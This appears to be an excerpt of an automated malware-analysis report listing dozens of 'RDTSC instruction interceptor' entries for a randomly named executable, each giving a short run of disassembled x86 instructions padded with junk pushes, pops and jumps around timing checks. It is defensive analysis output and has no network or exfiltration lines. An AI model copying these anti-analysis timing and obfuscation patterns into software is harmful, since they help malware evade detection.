Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F00195 second address: 4F001E7 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8124DF87D6h 0x00000008 jmp 00007F8124DF87D5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 mov ch, dl 0x00000013 pop esi 0x00000014 popad 0x00000015 and dword ptr [eax+04h], 00000000h 0x00000019 jmp 00007F8124DF87CFh 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov eax, edx 0x00000024 mov dl, FDh 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EE03E1 second address: 4EE040E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8124CF459Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0BCB second address: 4EF0C0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8124DF87D6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8124DF87D7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0C0C second address: 4EF0C33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov bx, 5DE6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8124CF45A8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0E99 second address: 4EF0ED6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8124DF87CEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8124DF87CEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0ED6 second address: 4EF0F04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8124CF45A6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EF0F04 second address: 4EF0F0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F200A4 second address: 4F200A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F200A8 second address: 4F200AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F200AE second address: 4F200FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov dx, cx 0x0000000e pushfd 0x0000000f jmp 00007F8124CF459Ah 0x00000014 add ecx, 54CF30B8h 0x0000001a jmp 00007F8124CF459Bh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F8124CF45A4h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F200FA second address: 4F2010C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8124DF87CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F2010C second address: 4F2019D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F8124CF459Dh 0x00000010 add esi, 6E5954B6h 0x00000016 jmp 00007F8124CF45A1h 0x0000001b popfd 0x0000001c jmp 00007F8124CF45A0h 0x00000021 popad 0x00000022 mov eax, dword ptr [774365FCh] 0x00000027 jmp 00007F8124CF45A0h 0x0000002c test eax, eax 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F8124CF459Eh 0x00000035 add cl, 00000038h 0x00000038 jmp 00007F8124CF459Bh 0x0000003d popfd 0x0000003e movzx esi, di 0x00000041 popad 0x00000042 je 00007F8197187D75h 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F8124CF459Eh 0x0000004f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F2019D second address: 4F201A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F201A3 second address: 4F201D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d jmp 00007F8124CF459Eh 0x00000012 xor eax, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F8124CF459Ah 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F201D7 second address: 4F20236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007F8124DF87D0h 0x00000011 ror eax, cl 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ecx, ebx 0x00000018 pushfd 0x00000019 jmp 00007F8124DF87D9h 0x0000001e or eax, 0A0C1FA6h 0x00000024 jmp 00007F8124DF87D1h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F20236 second address: 4F2024C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8124CF459Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F2024C second address: 4F20309 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8124DF87CFh 0x00000009 or ch, FFFFFF8Eh 0x0000000c jmp 00007F8124DF87D9h 0x00000011 popfd 0x00000012 mov ch, 4Ah 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 retn 0004h 0x0000001a nop 0x0000001b mov esi, eax 0x0000001d lea eax, dword ptr [ebp-08h] 0x00000020 xor esi, dword ptr [00392014h] 0x00000026 push eax 0x00000027 push eax 0x00000028 push eax 0x00000029 lea eax, dword ptr [ebp-10h] 0x0000002c push eax 0x0000002d call 00007F81299C898Ah 0x00000032 push FFFFFFFEh 0x00000034 pushad 0x00000035 call 00007F8124DF87D9h 0x0000003a pushfd 0x0000003b jmp 00007F8124DF87D0h 0x00000040 and cx, 7468h 0x00000045 jmp 00007F8124DF87CBh 0x0000004a popfd 0x0000004b pop esi 0x0000004c call 00007F8124DF87D9h 0x00000051 movzx esi, bx 0x00000054 pop edi 0x00000055 popad 0x00000056 pop eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a movsx edi, ax 0x0000005d pushfd 0x0000005e jmp 00007F8124DF87CEh 0x00000063 and si, C928h 0x00000068 jmp 00007F8124DF87CBh 0x0000006d popfd 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F20309 second address: 4F2034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007F81298C47F6h 0x00000011 mov edi, edi 0x00000013 jmp 00007F8124CF459Eh 0x00000018 xchg eax, ebp 0x00000019 jmp 00007F8124CF45A0h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F2034E second address: 4F20355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, 8Ah 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F20355 second address: 4F2035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F2035B second address: 4F2035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F2035F second address: 4F2037A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F8124CF459Ah 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F2037A second address: 4F20380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F20380 second address: 4F2038F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8124CF459Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F2038F second address: 4F203E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F8124DF87D3h 0x00000015 add esi, 5D9EB89Eh 0x0000001b jmp 00007F8124DF87D9h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4F203E8 second address: 4F203ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0029 second address: 4ED0087 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8124DF87CDh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8124DF87D1h 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov cx, 12F3h 0x00000016 mov bx, ax 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007F8124DF87D2h 0x00000021 and esp, FFFFFFF8h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F8124DF87D7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0087 second address: 4ED00C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8124CF45A8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED00C1 second address: 4ED00C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED00C5 second address: 4ED00CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED00CB second address: 4ED011B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, edi 0x0000000d mov bl, C5h 0x0000000f popad 0x00000010 xchg eax, ecx 0x00000011 jmp 00007F8124DF87D4h 0x00000016 xchg eax, ebx 0x00000017 jmp 00007F8124DF87D0h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8124DF87CEh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED011B second address: 4ED0171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F8124CF45A6h 0x0000000f mov ebx, dword ptr [ebp+10h] 0x00000012 pushad 0x00000013 mov edx, ecx 0x00000015 mov dx, si 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a jmp 00007F8124CF45A4h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8124CF459Eh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0171 second address: 4ED01BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F8124DF87D4h 0x00000011 add ax, 3628h 0x00000016 jmp 00007F8124DF87CBh 0x0000001b popfd 0x0000001c mov ch, DFh 0x0000001e popad 0x0000001f mov esi, dword ptr [ebp+08h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F8124DF87CDh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED01BF second address: 4ED01C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED01C5 second address: 4ED01E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 74h 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8124DF87CDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED01E0 second address: 4ED0281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8124CF45A7h 0x00000009 or si, 822Eh 0x0000000e jmp 00007F8124CF45A9h 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c call 00007F8124CF45A4h 0x00000021 push ecx 0x00000022 pop ebx 0x00000023 pop esi 0x00000024 popad 0x00000025 xchg eax, edi 0x00000026 jmp 00007F8124CF459Dh 0x0000002b test esi, esi 0x0000002d pushad 0x0000002e movzx ecx, di 0x00000031 push ebx 0x00000032 pushfd 0x00000033 jmp 00007F8124CF45A4h 0x00000038 adc ch, 00000068h 0x0000003b jmp 00007F8124CF459Bh 0x00000040 popfd 0x00000041 pop ecx 0x00000042 popad 0x00000043 je 00007F81971D2936h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0281 second address: 4ED0285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0285 second address: 4ED0289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0289 second address: 4ED028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED028F second address: 4ED02A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8124CF45A6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC08B4 second address: 4EC08BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC08BA second address: 4EC08C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC08C0 second address: 4EC08C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC08C4 second address: 4EC08F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8124CF459Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC08F3 second address: 4EC08F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC08F9 second address: 4EC0963 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F8124CF459Fh 0x00000010 add ecx, 4E2F0B9Eh 0x00000016 jmp 00007F8124CF45A9h 0x0000001b popfd 0x0000001c mov bl, ah 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov esi, ebx 0x00000024 jmp 00007F8124CF45A5h 0x00000029 popad 0x0000002a and esp, FFFFFFF8h 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F8124CF459Dh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC0963 second address: 4EC0998 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F8124DF87CEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8124DF87CEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC0998 second address: 4EC099E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC099E second address: 4EC09A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC09A2 second address: 4EC09DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F8124CF459Eh 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8124CF45A7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC09DE second address: 4EC0A0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8124DF87CCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC0A0A second address: 4EC0AB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F8124CF45A2h 0x00000012 or al, 00000008h 0x00000015 jmp 00007F8124CF459Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F8124CF45A8h 0x00000021 or si, 9568h 0x00000026 jmp 00007F8124CF459Bh 0x0000002b popfd 0x0000002c popad 0x0000002d mov ch, FFh 0x0000002f popad 0x00000030 mov esi, dword ptr [ebp+08h] 0x00000033 pushad 0x00000034 movsx ebx, ax 0x00000037 mov ah, A5h 0x00000039 popad 0x0000003a mov ebx, 00000000h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007F8124CF45A7h 0x00000048 or si, 6E0Eh 0x0000004d jmp 00007F8124CF45A9h 0x00000052 popfd 0x00000053 mov di, ax 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC0AB9 second address: 4EC0B03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F8124DF87D3h 0x00000014 sub cl, FFFFFFCEh 0x00000017 jmp 00007F8124DF87D9h 0x0000001c popfd 0x0000001d mov edi, ecx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC0B03 second address: 4EC0B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8124CF45A8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC0B1F second address: 4EC0B69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F81972DE02Dh 0x0000000e jmp 00007F8124DF87D7h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a jmp 00007F8124DF87D6h 0x0000001f mov ecx, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC0B69 second address: 4EC0B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC0D08 second address: 4EC0D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC0D0C second address: 4EC0D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC0D12 second address: 4EC0D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4EC0D18 second address: 4EC0D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0CF4 second address: 4ED0CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0CF8 second address: 4ED0D0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0D0A second address: 4ED0D41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 call 00007F8124DF87CDh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esp 0x0000000f pushad 0x00000010 push esi 0x00000011 mov ch, bh 0x00000013 pop ecx 0x00000014 mov bx, 82B6h 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8124DF87CFh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0D41 second address: 4ED0D47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0D47 second address: 4ED0D6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov cx, 6C23h 0x00000011 mov bh, al 0x00000013 popad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0A6D second address: 4ED0ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8124CF45A6h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F8124CF459Eh 0x00000018 and ax, 2D78h 0x0000001d jmp 00007F8124CF459Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 4ED0ABE second address: 4ED0AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
